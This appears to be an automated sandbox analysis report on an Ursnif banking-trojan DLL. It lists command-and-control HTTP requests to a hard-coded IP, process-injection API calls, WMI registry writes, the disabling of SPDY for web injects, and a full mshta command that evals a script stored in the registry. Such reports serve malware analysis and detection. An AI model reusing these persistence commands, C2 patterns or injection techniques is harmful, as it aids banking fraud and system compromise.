                      Source: global trafficHTTP traffic detected: GET /phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZikS/u68wld8v7/JzQJUDKg4_2FHKvnf_2F/gYZGX_2BFqw2fP1CIUg/LkSLAUfxVpj9UOLBiN4SzM/3p_2FST_2BWxB/bEkLoFXP/JI38DjkOM8fg69zOOdXCrW3/ft8HZYP438/0Zqpj_2F45Rs54Oh9/T9vyzwf7yRUW/99MF_2BHC7D/O7af6TuFb/aLreGz.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewASN Name: TENET-1ZA TENET-1ZA
                      Source: Joe Sandbox ViewIP Address: 146.70.35.138 146.70.35.138
                      Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.35.138/phpadmin/4B
                      Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.35.138/phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0
                      Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.35.138/phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/
                      Source: rundll32.exe, 00000002.00000003.591074518.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.70.35.138/phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZ
                      Source: rundll32.exe, 00000002.00000002.711900141.0000000002FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://177./h
                      Source: rundll32.exe, 00000002.00000003.591058289.0000000002F96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/phpadmin/J3_2FKtm_2/F8aRElX_2BaCkdSRs/XtZ8Oh_2FZR9/F7u3NLyz0yr/dRj0x6bx
                      Source: rundll32.exe, 00000002.00000003.591058289.0000000002F96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/t0=
                      Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: powershell.exe, 00000012.00000003.673423519.00000212B8284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: rundll32.exe, 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04894CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,2_2_04894CC6
                      Source: global trafficHTTP traffic detected: GET /phpadmin/4Ba1DnW6LKX/OzxV9dVdD8F0_2/FNnf6PuzcHmccJ6K45ku8/jhCd_2Fis3j6LdWS/9MB0W4d74KUWgvy/T9aFyptbRYDL9zzFFE/ey_2BT1JO/lSrTwjIXOahrvF9aSR6L/b9k1smqrQnVIlnliRgv/2ypsvB4cw7AtggmD2zEUH4/HQdlQahm_2BQO/aEvL9exV/IPSvc1E0OTLBBBSbKz_2F3u/WIddgbjcxL/NDBKkpcQJosXhuH1H/Ng78CGJ_2B/i.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/rImI92vjvUNrdqYhehfuQ/EzgCy9SUEjz2FceM/AZUBVoSihd3oytF/iNtO1XKcgiKIaSZikS/u68wld8v7/JzQJUDKg4_2FHKvnf_2F/gYZGX_2BFqw2fP1CIUg/LkSLAUfxVpj9UOLBiN4SzM/3p_2FST_2BWxB/bEkLoFXP/JI38DjkOM8fg69zOOdXCrW3/ft8HZYP438/0Zqpj_2F45Rs54Oh9/T9vyzwf7yRUW/99MF_2BHC7D/O7af6TuFb/aLreGz.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6768, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6092, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 5304, type: MEMORYSTR
                      Source: Yara matchFile source: 2.2.rundll32.exe.4890000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4c194a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51f6940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Disables SPDY (HTTP compression, likely to perform web injects)
                      Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04893072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_04893072

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489821C2_2_0489821C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489198A2_2_0489198A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0489475F2_2_0489475F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6C3A92_2_00B6C3A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B70B0E2_2_00B70B0E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B684D92_2_00B684D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B51E502_2_00B51E50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B58FA62_2_00B58FA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B737F42_2_00B737F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6488B CreateProcessAsUserW,2_2_00B6488B
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
                      Source: nhLAwAo49f.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04893A9C NtMapViewOfSection,2_2_04893A9C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04894695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_04894695
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_048925D7 GetProcAddress,NtCreateSection,memset,2_2_048925D7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04898441 NtQueryVirtualMemory,2_2_04898441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6312E RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,2_2_00B6312E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B712F1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_00B712F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B594A5 NtMapViewOfSection,2_2_00B594A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B644A5 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,2_2_00B644A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B65CA1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,2_2_00B65CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B51C78 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,2_2_00B51C78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6AD9E NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_00B6AD9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B65D9D NtQueryInformationProcess,2_2_00B65D9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6F5FF memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,2_2_00B6F5FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5DDDD GetProcAddress,NtCreateSection,memset,2_2_00B5DDDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6B628 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_00B6B628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5CF88 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,2_2_00B5CF88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5A085 memset,NtQueryInformationProcess,2_2_00B5A085
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B65830 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,2_2_00B65830
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B529B2 NtGetContextThread,RtlNtStatusToDosError,2_2_00B529B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B65188 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,2_2_00B65188
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6C1C2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,2_2_00B6C1C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B57A1E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,2_2_00B57A1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B51B92 NtQuerySystemInformation,RtlNtStatusToDosError,2_2_00B51B92
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B6264B NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,2_2_00B6264B
                      Source: nhLAwAo49f.dllBinary or memory string: OriginalFilenamerpcapd.exe0 vs nhLAwAo49f.dll
                      Source: nhLAwAo49f.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220422Jump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@31/29@0/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: nhLAwAo49f.dllReversingLabs: Detection: 28%
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 616
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 652
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
